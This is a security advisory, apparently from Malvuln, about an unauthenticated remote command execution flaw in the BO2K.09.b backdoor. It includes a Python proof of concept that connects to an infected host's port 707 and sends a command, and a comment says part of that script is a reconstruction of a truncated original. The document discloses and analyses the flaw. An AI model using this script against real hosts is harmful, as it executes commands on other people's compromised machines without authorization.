Authored by malvuln | Site malvuln.com

Backdoor.Win32.BO2K.09.b malware suffers from a code execution vulnerability.

Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/90894ac48059687ea80e565f7529e53f.txt
Contact: [email protected]
Media: twitter.com/malvuln

Threat: Backdoor.Win32.BO2K.09.b
Vulnerability: Unauthenticated Remote Command Execution
Description: Backdoor BO2K.09.b listens on TCP ports 707 and 808. Any third-party adversary who can reach those ports can execute arbitrary commands on the infected host by writing them to the socket, or obtain a remote shell with telnet, curl, etc. No authentication is required.
Type: PE32
MD5: 90894ac48059687ea80e565f7529e53f
Vuln ID: MVID-2021-0120
Dropped files:
Disclosure: 03/02/2021

Exploit/PoC:
from socket import *
import sys

MALWARE_HOST = "x.x.x.x"   # infected host
PORT = 707                 # BO2K.09.b also listens on 808
CMD = b"calc\n"            # command to run; the listener is line-based

def doit():
    try:
        s = socket(AF_INET, SOCK_STREAM)
        s.connect((MALWARE_HOST, PORT))
    except Exception as e:
        print(str(e))
        sys.exit(1)

    # Drain whatever the backdoor sends on connect (banner/prompt) until a
    # newline arrives or the socket closes. The original PoC is truncated
    # at this point; the break and the send of CMD are the minimal completion.
    while True:
        res = s.recv(128)
        print(res)
        if b"\n" in res or not res:
            break

    s.send(CMD)
    s.close()

if __name__ == "__main__":
    doit()